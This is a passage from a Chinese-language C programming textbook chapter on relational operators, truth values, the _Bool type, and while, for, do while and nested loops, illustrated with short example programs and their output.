语言的所有关系运算符。该表也涵盖了所有的数值关系(数字之 间的关系再复杂也没有人与人之间的关系复杂)。 表6.1 关系运算符 关系运算符常用于构造while语句和其他C语句(稍后讨论)中用到的关 系表达式。这些语句都会检查关系表达式为真还是为假。下面有3个互不相 关的while语句,其中都包含关系表达式。 while (number < 6) { printf("Your number is too small.\n"); scanf("%d", &number); } while (ch != '$') { 328 count++; scanf("%c", &ch); } while (scanf("%f", &num) == 1) sum = sum + num; 注意,第2个while语句的关系表达式还可用于比较字符。比较时使用的 是机器字符码(假定为ASCII)。但是,不能用关系运算符比较字符串。第 11章将介绍如何比较字符串。 虽然关系运算符也可用来比较浮点数,但是要注意:比较浮点数时,尽 量只使用<和>。因为浮点数的舍入误差会导致在逻辑上应该相等的两数却 不相等。例如,3乘以1/3的积是1.0。如果用把1/3表示成小数点后面6位数 字,乘积则是.999999,不等于1。使用fabs()函数(声明在math.h头文件中) 可以方便地比较浮点数,该函数返回一个浮点值的绝对值(即,没有代数符 号的值)。例如,可以用类似程序清单6.5的方法来判断一个数是否接近预 期结果。 程序清单6.5 cmpflt.c程序 // cmpflt.c -- 浮点数比较 #include <math.h> #include <stdio.h> int main(void) { const double ANSWER = 3.14159; 329 double response; printf("What is the value of pi?\n"); scanf("%lf", &response); while (fabs(response - ANSWER) > 0.0001) { printf("Try again!\n"); scanf("%lf", &response); } printf("Close enough!\n"); return 0; } 循环会一直提示用户继续输入,除非用户输入的值与正确值之间相差 0.0001: What is the value of pi? 3.14 Try again! 3.1416 Close enough! 
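如果程序里多处需要这种“足够接近”的判断,也可以把fabs()比较封装成一个小函数。下面是一个示意性的写法,其中函数名close_enough和容差参数tol都是假设的,并非标准库提供:

/* close.c -- 把浮点数的近似比较封装成函数(示意) */
#include <stdio.h>
#include <math.h>

int close_enough(double a, double b, double tol)
{
    return fabs(a - b) <= tol;  // 差的绝对值不超过容差即视为足够接近
}

int main(void)
{
    printf("%d\n", close_enough(3.1416, 3.14159, 0.0001)); // 打印1
    printf("%d\n", close_enough(3.14, 3.14159, 0.0001));   // 打印0
    return 0;
}

这样,程序清单6.5中的循环条件就可以改写成 while (close_enough(response, ANSWER, 0.0001) == 0) 的形式,效果相同。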
6.3.1 什么是真 330 这是一个古老的问题,但是对C而言还不算难。在C中,表达式一定有 一个值,关系表达式也不例外。程序清单6.6中的程序用于打印两个关系表 达式的值,一个为真,一个为假。 程序清单6.6 t_and_f.c程序 /* t_and_f.c -- C中的真和假的值 */ #include <stdio.h> int main(void) { int true_val, false_val; true_val = (10 > 2);    // 关系为真的值 false_val = (10 == 2); // 关系为假的值 printf("true = %d; false = %d \n", true_val, false_val); return 0; } 程序清单6.6把两个关系表达式的值分别赋给两个变量,即把表达式为 真的值赋给true_val,表达式为假的值赋给false_val。运行该程序后输出如 下: true = 1; false = 0 原来如此!对C而言,表达式为真的值是1,表达式为假的值是0。一些 C程序使用下面的循环结构,由于1为真,所以循环会一直进行。 while (1) 331 { ... } 6.3.2 其他真值 既然1或0可以作为while语句的测试表达式,是否还可以使用其他数 字?如果可以,会发生什么?我们用程序清单6.7来做个实验。 程序清单6.7 truth.c程序 // truth.c -- 哪些值为真 #include <stdio.h> int main(void) { int n = 3; while (n) printf("%2d is true\n", n--); printf("%2d is false\n", n); n = -3; while (n) printf("%2d is true\n", n++); printf("%2d is false\n", n); 332 return 0; } 该程序的输出如下: 3 is true 2 is true 1 is true 0 is false -3 is true -2 is true -1 is true 0 is false 执行第1个循环时,n分别是3、2、1,当n等于0时,第1个循环结束。与 此类似,执行第2个循环时,n分别是-3、-2和-1,当n等于0时,第2个循环结 束。一般而言,所有的非零值都视为真,只有0被视为假。在C中,真的概 念还真宽! 也可以说,只要测试条件的值为非零,就会执行 while 循环。这是从数 值方面而不是从真/假方面来看测试条件。要牢记:关系表达式为真,求值 得1;关系表达式为假,求值得0。因此,这些表达式实际上相当于数值。 许多C程序员都会很好地利用测试条件的这一特性。例如,用while (goats)替换while (goats !=0),因为表达式goats != 0和goats都只有在goats的值 为0时才为0或假。第1种形式(while (goats != 0))对初学者而言可能比较清 楚,但是第2种形式(while (goats))才是C程序员最常用的。要想成为一名 333 C程序员,应该多熟悉while (goats)这种形式。 6.3.3 真值的问题 C对真的概念约束太少会带来一些麻烦。例如,我们稍微修改一下程序 清单6.1,修改后的程序如程序清单6.8所示。 程序清单6.8 trouble.c程序 // trouble.c -- 误用=会导致无限循环 #include <stdio.h> int main(void) { long num; long sum = 0L; int status; printf("Please enter an integer to be summed "); printf("(q to quit): "); status = scanf("%ld", &num); while (status = 1) { sum = sum + num; printf("Please enter next integer (q to quit): "); 334 status = scanf("%ld", &num); } printf("Those integers sum to %ld.\n", sum); return 0; } 运行该程序,其输出如下: Please enter an integer to be summed (q to quit): 20 Please enter next integer (q to quit): 5 Please enter next integer (q to quit): 30 Please enter next integer (q to quit): q Please enter next integer (q to quit): Please enter next integer (q to quit): Please enter next integer (q to quit): Please enter next integer (q to quit): („„屏幕上会一直显示最后的提示内容,除非强行关闭程序。也许你根 本不想运行这个示例。) 这个麻烦的程序示例改动了while循环的测试条件,把status == 1替换成 status = 1。后者是一个赋值表达式语句,所以 status 的值为 1。而且,整个 赋值表达式的值就是赋值运算符左侧的值,所以status = 1的值也是1。这 里,while (status = 1)实际上相当于while (1),也就是说,循环不会退出。虽 然用户输入q,status被设置为0,但是循环的测试条件把status又重置为1,进 335 入了下一次迭代。 读者可能不太理解,程序的循环一直运行着,用户在输入q后完全没机 会继续输入。如果scanf()读取指定形式的输入失败,就把无法读取的输入留 在输入队列中,供下次读取。当scanf()把q作为整数读取时失败了,它把 q 留下。在下次循环时,scanf()从上次读取失败的地方(q)开始读取,scanf() 把q作为整数读取,又失败了。因此,这样修改后不仅创建了一个无限循 环,还创建了一个无限失败的循环,真让人沮丧。好在计算机觉察不出来。 对计算机而言,无限地执行这些愚蠢的指令比成功预测未来10年的股市行情 没什么两样。 不要在本应使用==的地方使用=。一些计算机语言(如,BASIC)用相 同的符号表示赋值运算符和关系相等运算符,但是这两个运算符完全不同 (见图 6.2)。赋值运算符把一个值赋给它左侧的变量;而关系相等运算符 检查它左侧和右侧的值是否相等,不会改变左侧变量的值(如果左侧是一个 变量)。 图6.2 关系运算符==和赋值运算符= 示例如下: 336 要注意使用正确的运算符。编译器不会检查出你使用了错误的形式,得 出也不是预期的结果(误用=的人实在太多了,以至于现在大多数编译器都 会给出警告,提醒用户是否要这样做)。如果待比较的一个值是常量,可以 把该常量放在左侧有助于编译器捕获错误: 可以这样做是因为C语言不允许给常量赋值,编译器会把赋值运算符的 这种用法作为语法错误标记出来。许多经验丰富的程序员在构建比较是否相 等的表达式时,都习惯把常量放在左侧。 总之,关系运算符用于构成关系表达式。关系表达式为真时值为1,为 假时值为0。通常用关系表达式作为测试条件的语句(如while和if)可以使 用任何表达式作为测试条件,非零为真,零为假。 6.3.4 新的_Bool类型 在C语言中,一直用int类型的变量表示真/假值。C99专门针对这种类型 的变量新增了_Bool类型。该类型是以英国数学家George Boole的名字命名 的,他开发了用代数表示逻辑和解决逻辑问题。在编程中,表示真或假的变 量被称为布尔变量(Boolean variable),所以_Bool是C语言中布尔变量的类 型名。_Bool类型的变量只能储存1(真)或0(假)。如果把其他非零数值 赋给_Bool类型的变量,该变量会被设置为1。这反映了C把所有的非零值都 视为真。 程序清单6.9修改了程序清单6.8中的测试条件,把int类型的变量status替 换为_Bool类型的变量input_is_good。给布尔变量取一个能表示真或假值的 变量名是一种常见的做法。 
337 程序清单6.9 boolean.c程序 // boolean.c -- 使用_Bool类型的变量 variable #include <stdio.h> int main(void) { long num; long sum = 0L; _Bool input_is_good; printf("Please enter an integer to be summed "); printf("(q to quit): "); input_is_good = (scanf("%ld", &num) == 1); while (input_is_good) { sum = sum + num; printf("Please enter next integer (q to quit): "); input_is_good = (scanf("%ld", &num) == 1); } printf("Those integers sum to %ld.\n", sum); return 0; 338 } 注意程序中把比较的结果赋值给_Bool类型的变量input_is_good: input_is_good = (scanf("%ld", &num) == 1); 这样做没问题,因为==运算符返回的值不是1就是0。顺带一提,从优 先级方面考虑的话,并不需要用圆括号把 括起来。但是,这样做可以提高代 码可读性。还要注意,如何为变量命名才能让while循环的测试简单易懂: while (input_is_good) C99提供了stdbool.h头文件,该头文件让bool成为_Bool的别名,而且还 把true和false分别定义为1和0的符号常量。包含该头文件后,写出的代码可 以与C++兼容,因为C++把bool、true和false定义为关键字。 如果系统不支持_Bool类型,导致无法运行该程序,可以把_Bool替换成 int即可。 6.3.5 优先级和关系运算符 关系运算符的优先级比算术运算符(包括+和-)低,比赋值运算符高。 这意味着x > y + 2和x > (y+ 2)相同,x = y > 2和x = (y > 2)相同。换言之,如 果y大于2,则给x赋值1,否则赋值0。y的值不会赋给x。 关系运算符比赋值运算符的优先级高,因此,x_bigger = x > y;相当于 x_bigger = (x > y);。 关系运算符之间有两种不同的优先级。 高优先级组: <<= >>= 低优先级组: == != 339 与其他大多数运算符一样,关系运算符的结合律也是从左往右。因此: ex != wye == zee与(ex != wye) == zee相同 首先,C判断ex与wye是否相等;然后,用得出的值1或0(真或假)再 与zee比较。我们并不推荐这样写,但是在这里有必要说明一下。 表6.2列出了目前我们学过的运算符的性质。附录B的参考资料II“C运算 符”中列出了全部运算符的完整优先级表。 表6.2 运算符优先级 小结:while语句 关键字:while 一般注解: while语句创建了一个循环,重复执行直到测试表达式为假或0。while语 句是一种入口条件循环,也就是说,在执行多次循环之前已决定是否执行循 环。因此,循环有可能不被执行。循环体可以是简单语句,也可以是复合语 句。 形式: while ( expression ) statement 340 在expression部分为假或0之前,重复执行statement部分。 示例: while (n++ < 100) printf(" %d %d\n",n, 2 * n + 1); // 简单语句 while (fargo < 1000) { // 复合语句 fargo = fargo + step; step = 2 * step; } 小结:关系运算符和表达式 关系运算符: 每个关系运算符都把它左侧的值和右侧的值进行比较。 <     小于 <=     小于或等于 ==     等于 >=     大于或等于 >     大于 !=     不等于 关系表达式: 341 简单的关系表达式由关系运算符及其运算对象组成。如果关系为真,关 系表达式的值为 1;如果关系为假,关系表达式的值为0。 示例: 5 > 2为真,关系表达式的值为1 (2 + a) == a 为假,关系表达式的值为0 342 6.4 不确定循环和计数循环 一些while循环是不确定循环(indefinite loop)。所谓不确定循环,指 在测试表达式为假之前,预先不知道要执行多少次循环。例如,程序清单 6.1通过与用户交互获得数据来计算整数之和。我们事先并不知道用户会输 入什么整数。另外,还有一类是计数循环(counting loop)。这类循环在执 行循环之前就知道要重复执行多少次。程序清单6.10就是一个简单的计数循 环。 程序清单6.10 sweetie1.c程序 // sweetie1.c -- 一个计数循环 #include <stdio.h> int main(void) { const int NUMBER = 22; int count = 1;             // 初始化 while (count <= NUMBER)        // 测试 { printf("Be my Valentine!\n");  // 行为 count++;              // 更新计数 } return 0; } 343 虽然程序清单6.10运行情况良好,但是定义循环的行为并未组织在一 起,程序的编排并不是很理想。我们来仔细分析一下。 在创建一个重复执行固定次数的循环中涉及了3个行为: 1.必须初始化计数器; 2.计数器与有限的值作比较; 3.每次循环时递增计数器。 while循环的测试条件执行比较,递增运算符执行递增。程序清单6.10 中,递增发生在循环的末尾,这可以防止不小心漏掉递增。因此,这样做比 将测试和更新组合放在一起(即使用count++ <= NUMBER)要好,但是计数 器的初始化放在循环外,就有可能忘记初始化。实践告诉我们可能会发生的 事情终究会发生,所以我们来学习另一种控制语句,可以避免这些问题。 344 6.5 for循环 for循环把上述3个行为(初始化、测试和更新)组合在一处。程序清单 6.11使用for循环修改了程序清单6.10的程序。 程序清单6.11 sweetie2.c程序 // sweetie2.c -- 使用for循环的计数循环 #include <stdio.h> int main(void) { const int NUMBER = 22; int count; for (count = 1; count <= NUMBER; count++) printf("Be my Valentine!\n"); return 0; } 关键字for后面的圆括号中有3个表达式,分别用两个分号隔开。第1个 表达式是初始化,只会在for循环开始时执行一次。第 2 个表达式是测试条 件,在执行循环之前对表达式求值。如果表达式为假(本例中,count大于 NUMBER时),循环结束。第3个表达式执行更新,在每次循环结束时求 值。程序清单6.10用这个表达式递增count 的值,更新计数。完整的for语句 还包括后面的简单语句或复合语句。for圆括号中的表达式也叫做控制表达 式,它们都是完整表达式,所以每个表达式的副作用(如,递增变量)都发 生在对下一个表达式求值之前。图6.3演示了for循环的结构。 345 图6.3 for循环的结构 程序清单6.12 for_cube.c程序 /* for_cube.c -- 使用for循环创建一个立方表 */ #include <stdio.h> int main(void) { int num; printf("   n  n cubed\n"); for (num = 1; num <= 6; num++) printf("%5d %5d\n", num, num*num*num); return 0; 346 } 程序清单6.12打印整数1~6及其对应的立方,该程序的输出如下: n    n cubed 1       1 2       8 3       27 4       64 5      125 6      216 
for循环的第1行包含了循环所需的所有信息:num的初值,num的终 值[1]和每次循环num的增量。 6.5.1 利用for的灵活性 虽然for循环看上去和FORTRAN的DO循环、Pascal的FOR循环、BASIC 的FOR...NEXT循环类似,但是for循环比这些循环灵活。这些灵活性源于如 何使用for循环中的3个表达式。以前面程序示例中的for循环为例,第1个表 达式给计数器赋初值,第2个表达式表示计数器的范围,第3个表达式递增计 数器。这样使用for循环确实很像其他语言的循环。除此之外,for循环还有 其他9种用法。 可以使用递减运算符来递减计数器: /* for_down.c */ #include <stdio.h> 347 int main(void) { int secs; for (secs = 5; secs > 0; secs--) printf("%d seconds!\n", secs); printf("We have ignition!\n"); return 0; } 该程序输出如下: 5 seconds! 4 seconds! 3 seconds! 2 seconds! 1 seconds! We have ignition! 可以让计数器递增2、10等: /* for_13s.c */ #include <stdio.h> int main(void) 348 { int n; // 从2开始,每次递增13 for (n = 2; n < 60; n = n + 13) printf("%d \n", n); return 0; } 每次循环n递增13,程序的输出如下: 2 15 28 41 54 可以用字符代替数字计数: /* for_char.c */ #include <stdio.h> int main(void) { char ch; for (ch = 'a'; ch <= 'z'; ch++) 349 printf("The ASCII value for %c is %d.\n", ch, ch); return 0; } 该程序假定系统用ASCII码表示字符。由于篇幅有限,省略了大部分输 出: The ASCII value for a is 97. The ASCII value for b is 98. ... The ASCII value for x is 120. The ASCII value for y is 121. The ASCII value for z is 122. 该程序能正常运行是因为字符在内部是以整数形式储存的,因此该循环 实际上仍是用整数来计数。 除了测试迭代次数外,还可以测试其他条件。在for_cube程序中,可以 把: for (num = 1; num <= 6; num++) 替换成: for (num = 1; num*num*num <= 216; num++) 如果与控制循环次数相比,你更关心限制立方的大小,就可以使用这样 的测试条件。 350 可以让递增的量几何增长,而不是算术增长。也就是说,每次都乘上而 不是加上一个固定的量: /* for_geo.c */ #include <stdio.h> int main(void) { double debt; for (debt = 100.0; debt < 150.0; debt = debt * 1.1) printf("Your debt is now $%.2f.\n", debt); return 0; } 该程序中,每次循环都把debt乘以1.1,即debt的值每次都增加10%,其 输出如下: Your debt is now $100.00. Your debt is now $110.00. Your debt is now $121.00. Your debt is now $133.10. Your debt is now $146.41. 第3个表达式可以使用任意合法的表达式。无论是什么表达式,每次迭 代都会更新该表达式的值。 351 /* for_wild.c */ #include <stdio.h> int main(void) { int x; int y = 55; for (x = 1; y <= 75; y = (++x * 5) + 50) printf("%10d %10d\n", x, y); return 0; } 该循环打印x的值和表达式++x * 5 + 50的值,程序的输出如下: 1      55 2      60 3      65 4      70 5      75 注意,测试涉及y,而不是x。for循环中的3个表达式可以是不同的变量 (注意,虽然该例可以正常运行,但是编程风格不太好。如果不在更新部分 加入代数计算,程序会更加清楚)。 可以省略一个或多个表达式(但是不能省略分号),只要在循环中包含 352 能结束循环的语句即可。 /* for_none.c */ #include <stdio.h> int main(void) { int ans, n; ans = 2; for (n = 3; ans <= 25;) ans = ans * n; printf("n = %d; ans = %d.\n", n, ans); return 0; } 该程序的输出如下: n = 3; ans = 54. 该循环保持n的值为3。变量ans开始的值为2,然后递增到6和18,最终 是54(18比25小,所以for循环进入下一次迭代,18乘以3得54)。顺带一 提,省略第2个表达式被视为真,所以下面的循环会一直运行: for (; ; ) printf("I want some action\n"); 第1个表达式不一定是给变量赋初值,也可以使用printf()。记住,在执 353 行循环的其他部分之前,只对第1个表达式求值一次或执行一次。 /* for_show.c */ #include <stdio.h> int main(void) { int num = 0; for (printf("Keep entering numbers!\n"); num != 6;) scanf("%d", &num); printf("That's the one I want!\n"); return 0; } 该程序打印第1行的句子一次,在用户输入6之前不断接受数字: Keep entering numbers! 3 5 8 6 That's the one I want! 
循环体中的行为可以改变循环头中的表达式。例如,假设创建了下面的 354 循环: for (n = 1; n < 10000; n = n + delta) 如果程序经过几次迭代后发现delta太小或太大,循环中的if语句(详见 第7章)可以改变delta的大小。在交互式程序中,用户可以在循环运行时才 改变 delta 的值。这样做也有危险的一面,例如,把delta设置为0就没用了。 总而言之,可以自己决定如何使用for循环头中的表达式,这使得在执 行固定次数的循环外,还可以做更多的事情。接下来,我们将简要讨论一些 运算符,使for循环更加有用。 小结:for语句 关键字:for 一般注解: for语句使用3个表达式控制循环过程,分别用分号隔开。initialize表达 式在执行for语句之前只执行一次;然后对test表达式求值,如果表达式为真 (或非零),执行循环一次;接着对update表达式求值,并再次检查test表达 式。for语句是一种入口条件循环,即在执行循环之前就决定了是否执行循 环。因此,for循环可能一次都不执行。statement部分可以是一条简单语句或 复合语句。 形式: for ( initialize; test; update ) statement 在test为假或0之前,重复执行statement部分。 示例: 355 for (n = 0; n < 10 ; n++) printf(" %d %d\n", n, 2 * n + 1); 356 6.6 其他赋值运算符:+=、-=、*=、/=、%= C有许多赋值运算符。最基本、最常用的是=,它把右侧表达式的值赋 给左侧的变量。其他赋值运算符都用于更新变量,其用法都是左侧是一个变 量名,右侧是一个表达式。赋给变量的新值是根据右侧表达式的值调整后的 值。确切的调整方案取决于具体的运算符。例如: scores += 20   与   scores = scores + 20   相同 dimes -= 2    与   dimes = dimes - 2       相同 bunnies *= 2   与   bunnies = bunnies * 2    相同 time /= 2.73   与   time = time / 2.73    相同 reduce %= 3    与   reduce = reduce % 3    相同 上述所列的运算符右侧都使用了简单的数,还可以使用更复杂的表达 式,例如: x *= 3 * y + 12 与 x = x * (3 * y + 12) 相同 以上提到的赋值运算符与=的优先级相同,即比+或*优先级低。上面最 后一个例子也反映了赋值运算符的优先级,3 * y先与12相加,再把计算结果 与x相乘,最后再把乘积赋给x。 并非一定要使用这些组合形式的赋值运算符。但是,它们让代码更紧 凑,而且与一般形式相比,组合形式的赋值运算符生成的机器代码更高效。 当需要在for循环中塞进一些复杂的表达式时,这些组合的赋值运算符特别 有用。 357 6.7 逗号运算符 逗号运算符扩展了for循环的灵活性,以便在循环头中包含更多的表达 式。例如,程序清单6.13演示了一个打印一类邮件资费(first-class postage rate)的程序(在撰写本书时,邮资为首重40美分/盎司,续重20美分/盎 司,可以在互联网上查看当前邮资)。 程序清单6.13 postage.c程序 // postage.c -- 一类邮资 #include <stdio.h> int main(void) { const int FIRST_OZ = 46;  // 2013邮资 const int NEXT_OZ = 20;   // 2013邮资 int ounces, cost; printf(" ounces  cost\n"); for (ounces = 1, cost = FIRST_OZ; ounces <= 16;  ounces++,cost += NEXT_OZ) printf("%5d  $%4.2f\n", ounces, cost / 100.0); return 0; } 该程序的前5行输出如下: 358 ounces cost 1     $0.46 2     $0.66 3     $0.86 4     $1.06 该程序在初始化表达式和更新表达式中使用了逗号运算符。初始化表达 式中的逗号使ounces和cost都进行了初始化,更新表达式中的逗号使每次迭 代ounces递增1、cost递增20(NEXT_Z的值是20)。绝大多数计算都在for循 环头中进行(见图6.4)。 逗号运算符并不局限于在for循环中使用,但是这是它最常用的地方。 逗号运算符有两个其他性质。首先,它保证了被它分隔的表达式从左往右求 值(换言之,逗号是一个序列点,所以逗号左侧项的所有副作用都在程序执 行逗号右侧项之前发生)。因此,ounces在cost之前被初始化。在该例中, 顺序并不重要,但是如果cost的表达式中包含了ounces时,顺序就很重要。 例如,假设有下面的表达式: ounces++, cost = ounces * FIRST_OZ 在该表达式中,先递增ounce,然后在第2个子表达式中使用ounce的新 值。作为序列点的逗号保证了左侧子表达式的副作用在对右侧子表达式求值 之前发生。 359 图6.4 逗号运算符和for循环 其次,整个逗号表达式的值是右侧项的值。例如,下面语句 x = (y = 3, (z = ++y + 2) + 5);的效果是:先把3赋给y,递增y为4,然后把 4加2之和(6)赋给z,接着加上5,最后把结果11赋给 x。至于为什么有人 编写这样的代码,在此不做评价。另一方面,假设在写数字时不小心输入了 逗号: houseprice = 249,500; 这不是语法错误,C 编译器会将其解释为一个逗号表达式,即 houseprice = 249 是逗号左侧的子表达式,500 是右侧的子表达式。因此,整 个逗号表达式的值是逗号右侧表达式的值,而且左侧的赋值表达式把249赋 给变量houseprice。因此,这与下面代码的效果相同: houseprice = 249; 500;记住,任何表达式后面加上一个分号就成了表达式语句。所以, 500;也是一条语句,但是什么也不做。 360 另外,下面的语句 houseprice = (249,500); 赋给houseprice的值是逗号右侧子表达式的值,即500。 逗号也可用作分隔符。在下面语句中的逗号都是分隔符,不是逗号运算 符: char ch, date; printf("%d %d\n", chimps, chumps); 小结:新的运算符 赋值运算符: 下面的运算符用右侧的值,根据指定的操作更新左侧的变量: +=  把右侧的值加到左侧的变量上 -=  从左侧的变量中减去右侧的值 *=  把左侧的变量乘以右侧的值 /=  把左侧的变量除以右侧的值 %=  左侧变量除以右侧值得到的余数 示例: rabbits *= 1.6;与rabbits = rabbits * 1.6;相同 这些组合赋值运算符与普通赋值运算符的优先级相同,都比算术运算符 的优先级低。因此, contents *= old_rate + 1.2; 361 最终的效果与下面的语句相同: contents = contents * (old_rate + 1.2); 逗号运算符: 逗号运算符把两个表达式连接成一个表达式,并保证最左边的表达式最 先求值。逗号运算符通常在for循环头的表达式中用于包含更多的信息。整 个逗号表达式的值是逗号右侧表达式的值。 示例: for (step = 2, fargo = 0; fargo < 1000; step *= 2) fargo += step; 6.7.1 当Zeno遇到for循环 接下来,我们看看 for 循环和逗号运算符如何解决古老的悖论。希腊哲 学家 Zeno 曾经提出箭永远不会达到它的目标。首先,他认为箭要到达目标 距离的一半,然后再达到剩余距离的一半,然后继续到达剩余距离的一半, 这样就无穷无尽。Zeno认为箭的飞行过程有无数个部分,所以要花费无数时 间才能结束这一过程。不过,我们怀疑Zeno是自愿甘做靶子才会得出这样的 结论。 
我们采用一种定量的方法,假设箭用1秒钟走完一半的路程,然后用1/2 秒走完剩余距离的一半,然后用1/4秒再走完剩余距离的一半,等等。可以 用下面的无限序列来表示总时间: 1 + 1/2 + 1/4 + 1/8 + 1/16 +.... 程序清单6.14中的程序求出了序列前几项的和。变量power_of_two的值 分别是1.0、2.0、4.0、8.0等。 程序清单6.14 zeno.c程序 362 /* zeno.c -- 求序列的和 */ #include <stdio.h> int main(void) { int t_ct;    // 项计数 double time, power_of_2; int limit; printf("Enter the number of terms you want: "); scanf("%d", &limit); for (time = 0, power_of_2 = 1, t_ct = 1; t_ct <= limit; t_ct++, power_of_2 *= 2.0) { time += 1.0 / power_of_2; printf("time = %f when terms = %d.\n", time, t_ct); } return 0; } 下面是序列前15项的和: Enter the number of terms you want: 15 363 time = 1.000000 when terms = 1. time = 1.500000 when terms = 2. time = 1.750000 when terms = 3. time = 1.875000 when terms = 4. time = 1.937500 when terms = 5. time = 1.968750 when terms = 6. time = 1.984375 when terms = 7. time = 1.992188 when terms = 8. time = 1.996094 when terms = 9. time = 1.998047 when terms = 10. time = 1.999023 when terms = 11. time = 1.999512 when terms = 12. time = 1.999756 when terms = 13. time = 1.999878 when terms = 14. time = 1.999939 when terms = 15. 不难看出,尽管不断添加新的项,但是总和看起来变化不大。就像程序 输出显示的那样,数学家的确证明了当项的数目接近无穷时,总和无限接近 2.0。假设S表示总和,下面我们用数学的方法来证明一下: S = 1 + 1/2 + 1/4 + 1/8 + ... 这里的省略号表示“等等”。把S除以2得: 364 S/2 = 1/2 + 1/4 + 1/8 + 1/16 + ... 第1个式子减去第2个式子得: S - S/2 = 1 +1/2 -1/2 + 1/4 -1/4 +... 除了第1个值为1,其他的值都是一正一负地成对出现,所以这些项都可 以消去。只留下: S/2 = 1 然后,两侧同乘以2,得: S = 2 从这个示例中得到的启示是,在进行复杂的计算之前,先看看数学上是 否有简单的方法可用。 程序本身是否有需要注意的地方?该程序演示了在表达式中可以使用多 个逗号运算符,在for循环中,初始化了time、power_of_2和count。构建完循 环条件之后,程序本身就很简短了。 365 6.8 出口条件循环:do while while循环和for循环都是入口条件循环,即在循环的每次迭代之前检查 测试条件,所以有可能根本不执行循环体中的内容。C语言还有出口条件循 环(exit-condition loop),即在循环的每次迭代之后检查测试条件,这保证 了至少执行循环体中的内容一次。这种循环被称为 do while循环。程序清单 6.15 演示了一个示例。 程序清单6.15 do_while.c程序 /* do_while.c -- 出口条件循环 */ #include <stdio.h> int main(void) { const int secret_code = 13; int code_entered; do { printf("To enter the triskaidekaphobia therapy club,\n"); printf("please enter the secret code number: "); scanf("%d", &code_entered); } while (code_entered != secret_code); printf("Congratulations! You are cured!\n"); 366 return 0; } 程序清单6.15在用户输入13之前不断提示用户输入数字。下面是一个运 行示例: To enter the triskaidekaphobia therapy club, please enter the secret code number: 12 To enter the triskaidekaphobia therapy club, please enter the secret code number: 14 To enter the triskaidekaphobia therapy club, please enter the secret code number: 13 Congratulations! You are cured! 使用while循环也能写出等价的程序,但是长一些,如程序清单6.16所 示。 程序清单6.16 entry.c程序 /* entry.c -- 出口条件循环 */ #include <stdio.h> int main(void) { const int secret_code = 13; int code_entered; 367 printf("To enter the triskaidekaphobia therapy club,\n"); printf("please enter the secret code number: "); scanf("%d", &code_entered); while (code_entered != secret_code) { printf("To enter the triskaidekaphobia therapy club,\n"); printf("please enter the secret code number: "); scanf("%d", &code_entered); } printf("Congratulations! 
You are cured!\n"); return 0; } 下面是do while循环的通用形式: do statement while ( expression ); statement可以是一条简单语句或复合语句。注意,do while循环以分号 结尾,其结构见图6.5。 do while循环在执行完循环体后才执行测试条件,所以至少执行循环体 一次;而for循环或while循环都是在执行循环体之前先执行测试条件。do 368 while循环适用于那些至少要迭代一次的循环。例如,下面是一个包含do while循环的密码程序伪代码: 图6.5 do while循环的结构 do { 提示用户输入密码 读取用户输入的密码 } while (用户输入的密码不等于密码); 避免使用这种形式的do while结构: do { 询问用户是否继续 369 其他行为 } while (回答是yes); 这样的结构导致用户在回答“no”之后,仍然执行“其他行为”部分,因为 测试条件执行晚了。 小结:do while语句 关键字:do while 一般注解: do while 语句创建一个循环,在 expression 为假或 0 之前重复执行循环 体中的内容。do while语句是一种出口条件循环,即在执行完循环体后才根 据测试条件决定是否再次执行循环。因此,该循环至少必须执行一次。 statement部分可是一条简单语句或复合语句。 形式: do statement while ( expression ); 在test为假或0之前,重复执行statement部分。 示例: do scanf("%d", &number); while (number != 20); 370 6.9 如何选择循环 如何选择使用哪一种循环?首先,确定是需要入口条件循环还是出口条 件循环。通常,入口条件循环用得比较多,有几个原因。其一,一般原则是 在执行循环之前测试条件比较好。其二,测试放在循环的开头,程序的可读 性更高。另外,在许多应用中,要求在一开始不满足测试条件时就直接跳过 整个循环。 那么,假设需要一个入口条件循环,用for循环还是while循环?这取决 于个人喜好,因为二者皆可。要让for循环看起来像while循环,可以省略第1 个和第3个表达式。例如: for ( ; test ; ) 与下面的while效果相同: while ( test ) 要让while循环看起来像for循环,可以在while循环的前面初始化变量, 并在while循环体中包含更新语句。例如: 初始化; while ( 测试 ) { 其他语句 更新语句 } 与下面的for循环效果相同: 371 for ( 初始化 ;测试 ; 更新 ) 其他语句 一般而言,当循环涉及初始化和更新变量时,用for循环比较合适,而 在其他情况下用while循环更好。对于下面这种条件,用while循环就很合 适: while (scanf("%ld", &num) == 1) 对于涉及索引计数的循环,用for循环更适合。例如: for (count = 1; count <= 100; count++) 372 6.10 嵌套循环 嵌套循环(nested loop)指在一个循环内包含另一个循环。嵌套循环常 用于按行和列显示数据,也就是说,一个循环处理一行中的所有列,另一个 循环处理所有的行。程序清单6.17演示了一个简单的示例。 程序清单6.17 rows1.c程序 /* rows1.c -- 使用嵌套循环 */ #include <stdio.h> #define ROWS  6 #define CHARS 10 int main(void) { int row; char ch; for (row = 0; row < ROWS; row++)         /* 第10行 */ { for (ch = 'A'; ch < ('A' + CHARS); ch++)   /* 第12行 */ printf("%c", ch); printf("\n"); } 373 return 0; } 运行该程序后,输出如下: ABCDEFGHIJ ABCDEFGHIJ ABCDEFGHIJ ABCDEFGHIJ ABCDEFGHIJ ABCDEFGHIJ 6.10.1 程序分析 第10行开始的for循环被称为外层循环(outer loop),第12行开始的for 循环被称为内层循环(inner loop)。外层循环从row为0开始循环,到row为 6时结束。因此,外层循环要执行6次,row的值从0变为5。每次迭代要执行 的第1条语句是内层的for循环,该循环要执行10次,在同一行打印字符A~ J;第2条语句是外层循环的printf("\n");,该语句的效果是另起一行,这样在 下一次运行内层循环时,将在下一行打印的字符。 注意,嵌套循环中的内层循环在每次外层循环迭代时都执行完所有的循 环。在程序清单6.17中,内层循环一行打印10个字符,外层循环创建6行。 6.10.2 嵌套变式 上一个实例中,内层循环和外层循环所做的事情相同。可以通过外层循 环控制内层循环,在每次外层循环迭代时内层循环完成不同的任务。把程序 清单6.17稍微修改后,如程序清单6.18所示。内层循环开始打印的字符取决 374 于外层循环的迭代次数。该程序的第 1 行使用了新的注释风格,而且用 const 关键字代替#define,有助于读者熟悉这两种方法。 程序清单6.18 rows2.c程序 // rows2.c -- 依赖外部循环的嵌套循环 #include <stdio.h> int main(void) { const int ROWS = 6; const int CHARS = 6; int row; char ch; for (row = 0; row < ROWS; row++) { for (ch = ('A' + row); ch < ('A' + CHARS); ch++) printf("%c", ch); printf("\n"); } return 0; } 375 该程序的输出如下: ABCDEF BCDEF CDEF DEF EF F 因为每次迭代都要把row的值与‘A’相加,所以ch在每一行都被初始化为 